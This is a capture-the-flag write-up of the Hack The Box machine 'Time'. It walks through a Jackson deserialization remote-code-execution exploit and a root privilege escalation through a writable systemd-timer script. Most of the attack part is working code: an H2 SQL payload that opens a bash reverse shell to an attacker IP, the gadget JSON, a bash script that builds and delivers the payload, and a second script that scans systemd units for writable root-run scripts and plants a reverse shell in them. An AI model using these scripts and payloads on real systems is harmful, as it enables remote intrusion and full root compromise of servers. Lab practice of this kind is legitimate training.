OSCP Preparations – HTB Time

Time is a retired Linux machine on Hack The Box. The goal is to obtain the user and root flags by exploiting its vulnerabilities.
We start with an nmap scan to identify the services running on the target.
Classic Scan

Full Port Scan

The port scan shows two open ports: 22/tcp (OpenSSH 8.2p1) and 80/tcp (Apache). We have no credentials and this OpenSSH version offers no obvious attack surface, so we focus our enumeration on port 80.
We performed file and directory scans.
Gobuster scan

The file and directory scan did not turn up anything useful.
We also checked the browser developer tools, the page source and Wappalyzer, and found nothing of interest.

Looking at the form, the page accepts JSON and offers two modes for it: Beautify and Validate.
Let's submit some JSON and see how it is parsed.

The input {"name": "muhammed", "surname": "aygun", "age": "null"} is beautified as expected:

Now let's submit the same input in Validate mode.

Validate returns an error:
Validation failed: Unhandled Java exception: com.fasterxml.jackson.databind.exc.MismatchedInputException: Unexpected token (START_OBJECT), expected START_ARRAY: need JSON Array to contain As.WRAPPER_ARRAY type information for class java.lang.Object
This error is valuable. It tells us that our JSON is parsed server-side by Jackson (com.fasterxml.jackson.databind), and the complaint about As.WRAPPER_ARRAY type information means polymorphic typing is enabled: the parser expects an array whose first element names the Java class to instantiate. That is exactly the setting that makes Jackson deserialization gadgets possible.
Let's investigate this error. Is there a known exploit?

Searching for the error leads to the Jackson polymorphic deserialization vulnerability (CVE-2019-12384), which is explained very well at https://blog.doyensec.com/2019/07/22/jackson-gadgets.html. The application deserializes JSON supplied by an untrusted client with polymorphic typing enabled, and with the logback and H2 libraries on the classpath the gadget ch.qos.logback.core.db.DriverManagerConnectionSource can be abused for SSRF and, through H2's RUNSCRIPT, for remote code execution. Let's look for a ready-made exploit.

We found a GitHub repository with a working exploit; the steps below follow it.

  1. Create the inject.sql file with the following contents. It defines an H2 alias that executes a shell command and then calls it with a bash reverse shell back to our machine:

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
String[] command = {"bash", "-c", cmd};
java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
return s.hasNext() ? s.next() : ""; }
$$;
CALL SHELLEXEC('bash -i >& /dev/tcp/10.10.14.4/4747 0>&1')

  2. python3 -m http.server
     Serve the file over HTTP (port 8000 by default) so the target can fetch it.
  3. nc -lvnp 4747
     Listen for the reverse shell on the port used in inject.sql.
  4. Submit the following to the vulnerable application in Validate mode:
     ["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url": "jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.4:8000/inject.sql'"}]
     Jackson instantiates the logback class, which opens the JDBC URL; the H2 INIT=RUNSCRIPT parameter makes the driver download and execute inject.sql, and the CALL at the end spawns our shell.
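To keep the three steps together, here is a small bash helper, added to this write-up and not taken from the GitHub repository it follows. It writes inject.sql for a given listener address, prints the gadget JSON to paste into the Validate form, and optionally POSTs it with curl. The listener IP and ports are the ones from the steps above; the form field name (data) and the target URL are assumptions and must be replaced with what an intercepted Validate request actually looks like.

```bash
#!/usr/bin/env bash
# Added example (not from the original write-up or the exploit repo): build
# and optionally deliver the Jackson / logback / H2 RUNSCRIPT payload.
# Usage: ./jackson_h2.sh [LHOST] [LPORT] [HTTP_PORT] [TARGET_URL]
set -eu

# Write inject.sql: an H2 alias that runs a shell command, then a CALL that
# fires a bash reverse shell back to LHOST:LPORT.
make_inject_sql() {
  local lhost=$1 lport=$2 out=$3
  cat > "$out" <<EOF
CREATE ALIAS SHELLEXEC AS \$\$ String shellexec(String cmd) throws java.io.IOException {
    String[] command = {"bash", "-c", cmd};
    java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\\\A");
    return s.hasNext() ? s.next() : ""; }
\$\$;
CALL SHELLEXEC('bash -i >& /dev/tcp/${lhost}/${lport} 0>&1')
EOF
}

# The JSON Jackson deserializes: a two-element array, class name first.
# jdbc:h2:mem: plus INIT=RUNSCRIPT makes the H2 driver fetch and run the SQL.
make_gadget_json() {
  local lhost=$1 http_port=$2
  printf "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\": \"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://%s:%s/inject.sql'\"}]\n" "$lhost" "$http_port"
}

# Submit the payload. The form field name "data" and the URL are
# assumptions: take the real ones from an intercepted Validate request.
send_payload() {
  local target=$1 json=$2
  curl -s -o /dev/null -X POST "$target" --data-urlencode "data=$json"
}

lhost=${1:-10.10.14.4}; lport=${2:-4747}; http_port=${3:-8000}; target=${4:-}
workdir=$(mktemp -d)
make_inject_sql "$lhost" "$lport" "$workdir/inject.sql"
payload=$(make_gadget_json "$lhost" "$http_port")
echo "inject.sql written to $workdir; serve it with: (cd $workdir && python3 -m http.server $http_port)"
echo "listener: nc -lvnp $lport"
echo "payload for the Validate form:"
echo "$payload"
if [ -n "$target" ]; then
  send_payload "$target" "$payload"
fi
```

Note the doubled backslash in useDelimiter("\\A"): the alias body is Java source compiled by H2, so the regex \A has to be written as a Java string literal. A single backslash, which is what a copy from a rendered web page often gives you, fails to compile and the CALL never runs.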

Once the payload runs, our listener receives a shell as the user pericles.
From there we read the user flag.

We cannot read /root because we are not root, so we enumerate the box locally for a privilege escalation path.

Linpeas flags /usr/bin/timer_backup.sh as an interesting file. Before reading it, let's find out where it is used.

The "timer" in the name suggests a systemd timer, so we look for timer_backup.timer and check what it does.

The timer triggers timer_backup.service. Let's look at timer_backup.service.

The service runs /usr/bin/timer_backup.sh. A systemd service runs as root unless a User= directive says otherwise, so this is a promising target.
Let's look at the content and ownership of this file.

The script is a short bash script that performs a backup, and the file is owned by pericles, the user we already control. A root service is executing a file we can write to: if we append a reverse shell to the script, the next run of the timer gives us a root shell.
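The check we did by hand above can be made systematic. The bash script below is an added example, not part of the original write-up: it reads the ExecStart= program out of a service unit, flags the unit when it runs as root and the program is writable by the current user, and appends the reverse shell used earlier. It goes a little beyond the single unit on this box by scanning a whole directory of .service files. The unit and script it creates for the demo are constructed; the real ones were timer_backup.timer, timer_backup.service and /usr/bin/timer_backup.sh.

```bash
#!/usr/bin/env bash
# Added example (not from the original write-up): find systemd services that
# run a script the current user can modify, and plant a reverse shell in it.
set -eu

# Print the program from the unit's ExecStart= line (first token, ignoring
# the optional -, @, + and ! prefixes systemd allows).
exec_start_path() {
  local unit=$1
  sed -n 's/^ExecStart=[-@+!]*\([^ ]*\).*/\1/p' "$unit" | head -n 1
}

# True when the unit runs as root (no User= line, or User=root) and the
# program it starts is writable by us: a root service executing our code.
vulnerable_unit() {
  local unit=$1 script
  script=$(exec_start_path "$unit")
  [ -n "$script" ] || return 1
  if grep -q '^User=' "$unit" && ! grep -q '^User=root$' "$unit"; then
    return 1
  fi
  [ -w "$script" ]
}

# Append a bash reverse shell so the next timer run connects back to us.
add_reverse_shell() {
  local script=$1 lhost=$2 lport=$3
  printf '\nbash -i >& /dev/tcp/%s/%s 0>&1\n' "$lhost" "$lport" >> "$script"
}

# Report every qualifying unit in a directory (on a real box: /etc/systemd/system).
scan_units() {
  local dir=$1 unit
  for unit in "$dir"/*.service; do
    [ -e "$unit" ] || continue
    if vulnerable_unit "$unit"; then
      echo "$unit -> $(exec_start_path "$unit")"
    fi
  done
}

# Demo against a constructed unit and script, not the ones on the box.
demo() {
  local work
  work=$(mktemp -d)
  printf '#!/bin/bash\n# constructed backup job\n' > "$work/timer_backup.sh"
  chmod 755 "$work/timer_backup.sh"
  cat > "$work/timer_backup.service" <<EOF
[Unit]
Description=constructed backup unit
[Service]
Type=oneshot
ExecStart=$work/timer_backup.sh
EOF
  scan_units "$work"
  add_reverse_shell "$work/timer_backup.sh" 10.10.14.4 4747
  tail -n 1 "$work/timer_backup.sh"
}

demo
```

On the target, run systemctl list-timers to see when timer_backup.timer fires next, and have nc -lvnp 4747 listening before that moment; the shell arrives as root because the service, not pericles, executes the modified script.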

When the timer fires, the root shell lands on our listener.

That's how we got root on Time.